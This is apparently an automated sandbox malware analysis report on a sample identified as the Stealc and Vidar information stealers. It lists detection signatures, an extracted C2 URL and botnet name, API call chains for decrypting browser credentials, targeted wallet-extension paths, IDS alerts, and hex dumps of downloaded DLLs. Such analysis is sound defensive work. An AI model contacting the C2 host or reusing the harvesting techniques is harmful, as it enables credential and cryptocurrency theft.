Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1520704
MD5: 48b59bd4c9219cc6f4bca6a45642dcbd
SHA1: e9a3185cf22da2569a55ed64253f0a16b60070d9
SHA256: 0411c3152398d2ce23e4bf07868adf49a5d24fe27558cbd92fb8fcb787b926de
Tags: exeuser-Bitsight
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Found malware configuration
Source: 0.2.file.exe.3595570.0.raw.unpack Malware Configuration Extractor: StealC {"C2 url": "http://194.87.29.53/6f9307efa625dd18.php", "Botnet": "oleh_psp"}
Source: 0.2.file.exe.3595570.0.raw.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://194.87.29.53/6f9307efa625dd18.php", "Botnet": "oleh_psp"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 3_2_00409B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA, 3_2_0040C820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 3_2_00407240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 3_2_00409AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 3_2_00418EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C306C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 3_2_6C306C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C45A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 3_2_6C45A9A0
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1853131872.000000006C36D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1854092669.000000006C52F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source: Binary string: c:\rje\tg\k\obj\Release\ojc.pdb source: file.exe
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source: Binary string: c:\rje\tg\k\obj\Release\ojc.pdbX source: file.exe
Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1854092669.000000006C52F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1853131872.000000006C36D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 3_2_0040E430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 3_2_00414910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040BE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_004016D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040DA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 3_2_00413EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_0040F6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose, 3_2_004138B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 3_2_00414570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 3_2_0040ED20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040DE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:60865 -> 194.87.29.53:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:60865 -> 194.87.29.53:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 194.87.29.53:80 -> 192.168.2.4:60865
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:60865 -> 194.87.29.53:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 194.87.29.53:80 -> 192.168.2.4:60865
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:60865 -> 194.87.29.53:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://194.87.29.53/6f9307efa625dd18.php
Source: Malware configuration extractor URLs: http://194.87.29.53/6f9307efa625dd18.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 16:29:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 16:29:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 16:29:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 16:29:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 